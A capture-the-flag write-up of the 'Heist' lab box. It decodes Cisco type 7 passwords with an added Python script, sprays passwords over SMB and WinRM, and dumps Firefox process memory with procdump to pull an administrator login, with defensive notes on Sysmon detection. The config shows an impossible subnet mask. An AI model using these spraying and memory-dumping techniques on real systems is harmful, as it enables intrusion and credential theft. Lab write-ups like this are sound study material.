Heist is an Easy Windows box. I wanted to take it easy and do something relaxing, and this one was very interesting to say the least. It starts with a website where you can log in as a guest and read the recent posts. Doing so gives you a username as well as an attachment, which turns out to be a Cisco config file. You can work out what type of hash the passwords are and crack them. From there you can get a list of users and spray the passwords to find one that has WinRM access. Looking around the directories and at anything out of the norm, you find the running processes, in particular a Firefox process, whose memory can be dumped while it is still in use. Using procdump64.exe, we dump the process memory, filter through it and retrieve the Administrator password.

Initial Nmap

```
PORT    STATE SERVICE       REASON          VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-04-06T22:12:43
|_ start_date: N/A
|_clock-skew: 1s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48515/tcp): CLEAN (Timeout)
| Check 2 (port 35033/tcp): CLEAN (Timeout)
| Check 3 (port 25486/udp): CLEAN (Timeout)
| Check 4 (port 29195/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
```

HelpDesk Support, Please Help!

Looking at port 80 we see a site with the option to log in as a guest. We also find a potential user.

We also see the configuration he so kindly attached.

```
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
```

Looking into how Cisco stores passwords, we can identify the hash type from each line: the `password 7` entries are reversibly encoded (Cisco type 7), so they can be decoded directly, while the `enable secret 5` is an MD5-crypt hash (`$1$...`) that has to be cracked offline. We try the resulting passwords against the user we found, hazard. When we try them against the site we don’t get access.
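As an added example (not code from the write-up), the following script triages the credential lines from the config above the way the text describes: it recognises `password 7` entries and decodes them, and for `enable secret 5` (and other hashed types) it reports the algorithm and the offline cracking mode instead. The fixed XOR key is Cisco's well-known type 7 key table; the mapping of secret types to hashcat modes is from my own notes, not from the page. The config lines embedded in `CONFIG` are the ones shown above.

```python
"""Triage the credential lines of a Cisco IOS config (added example)."""
import re

# Cisco's fixed, publicly known key for "password 7" (type 7). Because the
# key is a constant shipped in IOS, type 7 is obfuscation, not encryption.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Hashed secret types and how they are handled offline (assumption: my notes
# on hashcat modes, not something the write-up states).
HASH_TYPES = {
    "0": ("plaintext", None),
    "5": ("md5crypt ($1$)", "hashcat -m 500 / john --format=md5crypt"),
    "8": ("PBKDF2-SHA256 ($8$)", "hashcat -m 9200"),
    "9": ("scrypt ($9$)", "hashcat -m 9300"),
}

# Lines copied from the attached config shown in the write-up.
CONFIG = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

LINE_RE = re.compile(
    r"^(?:username (?P<user>\S+)(?: privilege \d+)?|(?P<enable>enable))"
    r" (?:password|secret) (?P<type>\d+) (?P<value>\S+)$"
)


def type7_decode(encoded: str) -> str:
    """Type 7: two decimal digits give the key offset, the rest is hex bytes
    XORed with the key starting at that offset."""
    if len(encoded) < 4 or len(encoded) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", encoded):
        raise ValueError("not a type 7 string: %r" % encoded)
    seed = int(encoded[:2], 10)
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


def type7_encode(plaintext: str, seed: int = 2) -> str:
    """Inverse of type7_decode; useful to confirm the decoder round-trips."""
    data = plaintext.encode("ascii")
    body = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return "%02d%s" % (seed, body.hex().upper())


def triage_config(config: str) -> list:
    """Return one finding per credential line: decoded type 7 secrets, and
    algorithm plus cracking tool for hashed types."""
    findings = []
    for line in config.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        user = m["user"] or "enable"
        secret_type, value = m["type"], m["value"]
        if secret_type == "7":
            findings.append({"user": user, "type": 7, "action": "decoded",
                             "secret": type7_decode(value)})
        else:
            algo, tool = HASH_TYPES.get(secret_type, ("unknown", None))
            findings.append({"user": user, "type": int(secret_type),
                             "action": "crack offline", "algorithm": algo,
                             "tool": tool, "hash": value})
    return findings


if __name__ == "__main__":
    for finding in triage_config(CONFIG):
        print(finding)
```

The point worth taking from the config itself is that `service password-encryption` only turns on type 7, which this script reverses in a few lines; only `enable secret` (type 5, or better 8/9 on newer IOS) gives a real hash.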

SMB for users

Using our password list we can spray and see which one works for our user.

```
$ nxc smb 10.10.10.149 -u hazard -p pass.lst
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\hazard:<SNIP>
```

From here we can get a list of users.

```
$ nxc smb 10.10.10.149 -u hazard -p <SNIP> --rid-brute | grep SidTypeUser | cut -d '\' -f2 | awk '{print $1}' > users.list
```

Then, since I have some passwords to try, I’ll try them against all the users we gathered.

```
$ nxc smb 10.10.10.149 -u users.list -p pass.lst --continue-on-success
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Hazard:<SNIP>
SMB 10.10.10.149 445 SUPPORTDESK [-] Connection Error: Error occurs while reading from remote(104)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Chase:<SNIP>
```

WinRM-ing

We can also look to see who has WinRM access.

```
$ nxc winrm 10.10.10.149 -u users.list -p pass.lst --continue-on-success
WINRM 10.10.10.149 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
<SNIP>
WINRM 10.10.10.149 5985 SUPPORTDESK [+] SupportDesk\Chase:<SNIP> (Pwn3d!)
```

Looks like user chase has some access, let’s hop on the machine.

Banking with Chase 😂

After getting connected, we look at the usual.

  • Unusual installed programs and directories in C:
  • Services running/Process running (‘ps’)
  • User permissions and groups
  • etc,etc,etc

Looking into the running processes we see Firefox, and for that matter it seems to be in use right now. So we can dump the memory of this process.

```
*Evil-WinRM* PS C:\Users\Chase\Documents> ps

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
463 18 2240 5320 364 0 csrss
290 13 2224 5076 480 1 csrss
357 15 3500 14548 5052 1 ctfmon
255 14 3896 13288 3788 0 dllhost
166 9 1872 9632 0.02 6672 1 dllhost
617 32 29092 57664 968 1 dwm
1492 57 23540 79016 3856 1 explorer
1164 68 129556 206536 3.42 6344 1 firefox
347 19 10168 35328 0.05 6468 1 firefox
401 34 30516 89464 0.42 6612 1 firefox
378 28 21968 58372 0.19 6884 1 firefox
355 25 16396 38740 0.06 7144 1 firefox
49 6 1792 4600 784 1 fontdrvhost
<SNIP>
```

Using procdump64.exe, a neat tool from Sysinternals, we can dump the memory of the process.

```
*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump64.exe -mm 6344 firefox

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[19:06:16] Dump 1 initiated: C:\Users\Chase\Documents\firefox.dmp
[19:06:16] Dump 1 complete: 5 MB written in 0.1 seconds
[19:06:16] Dump count reached.

*Evil-WinRM* PS C:\Users\Chase\Documents> ls


Directory: C:\Users\Chase\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/7/2025 7:06 PM 4594512 firefox.dmp
-a---- 4/7/2025 7:05 PM 424856 procdump64.exe


*Evil-WinRM* PS C:\Users\Chase\Documents>
```

System Administrator left something

After getting the .dmp to our machine, easiest via an SMB server, we can look through its contents for anything related to the machine or its users.

```
$ strings firefox.log.dmp |less
<SNIP>
MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini
localhost/login.php?login_username=admin@support.htb&login_password=<SNIP>&login=
DELETE FROM moz_anno_attributes WHERE id IN (
```

There it is: we find a POST request with the username and password. We can log in with the Administrator account now.
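The `strings | less` step above works, but scrolling through a dump by hand does not scale, and a defender doing the same review after an incident wants the hits located, not eyeballed. As an added example that is not part of the write-up, the script below reimplements the `strings` extraction (runs of printable ASCII of a minimum length) and then parses any URL-looking string for login form parameters, reporting the offset, the username and the length of the secret without printing the secret itself. The dump bytes in `SAMPLE_DUMP` are constructed to resemble the Firefox dump output shown above, with a made-up password; the parameter names it looks for (`login_password`, `password`, and so on) are my assumption about typical form fields. Two things worth remembering on the detection side: the `procdump64.exe -mm` run above is a cross-process memory read, which is exactly what Sysmon Event ID 10 (ProcessAccess) records, and the resulting `.dmp` file is itself a credential-bearing artifact that should be treated like one.

```python
"""Locate credential-bearing strings in a process memory dump (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Query-string keys treated as secrets (assumption: common form field names).
CRED_PARAMS = ("login_password", "password", "passwd", "pwd")

# Something that looks like host/path?query inside a longer string.
URL_RE = re.compile(r"[A-Za-z0-9.-]+/[\w./-]*\?\S+")

# Constructed stand-in for firefox.dmp: binary noise around strings similar to
# the ones seen in the real dump. The password value is made up.
SAMPLE_DUMP = (
    b"\x00\x01MZ\x90\x00" * 3
    + b"MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\\Program Files\\Mozilla Firefox"
      b"\\browser\\crashreporter-override.ini\x00"
    + bytes(range(0, 32)) * 2
    + b"localhost/login.php?login_username=admin@support.htb"
      b"&login_password=Example_Pass_123&login=\x00"
    + b"\xff\xfe"
    + b"DELETE FROM moz_anno_attributes WHERE id IN (\x00"
)


def extract_strings(data: bytes, min_len: int = 4):
    """Yield (offset, text) for each printable-ASCII run of at least min_len
    bytes, the same thing the classic `strings` tool does."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield m.start(), m.group().decode("ascii")


def find_credentials(data: bytes) -> list:
    """Return one record per string that carries a login form submission.
    The secret's value is deliberately not included, only its length."""
    hits = []
    for offset, text in extract_strings(data):
        for url in URL_RE.findall(text):
            query = urlsplit("http://" + url).query
            params = parse_qs(query, keep_blank_values=True)
            secret_keys = [k for k in params if k.lower() in CRED_PARAMS]
            if not secret_keys:
                continue
            username = next((params[k][0] for k in params if "user" in k.lower()), None)
            hits.append({
                "offset": offset,
                "url": url.split("?", 1)[0],
                "username": username,
                "password_field": secret_keys[0],
                "password_len": len(params[secret_keys[0]][0]),
            })
    return hits


if __name__ == "__main__":
    import sys
    # Pass a real dump path to scan it; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for hit in find_credentials(data):
        print(hit)
```

Run it as `python3 scan_dump.py firefox.dmp` (any file name for the script works) to get offsets you can then inspect with a hex viewer; on a multi-gigabyte full dump you would stream the file in chunks rather than read it whole, but the matching logic is the same.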

```
$ evil-winrm -i 10.10.10.149 -u administrator -p <SNIP>

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```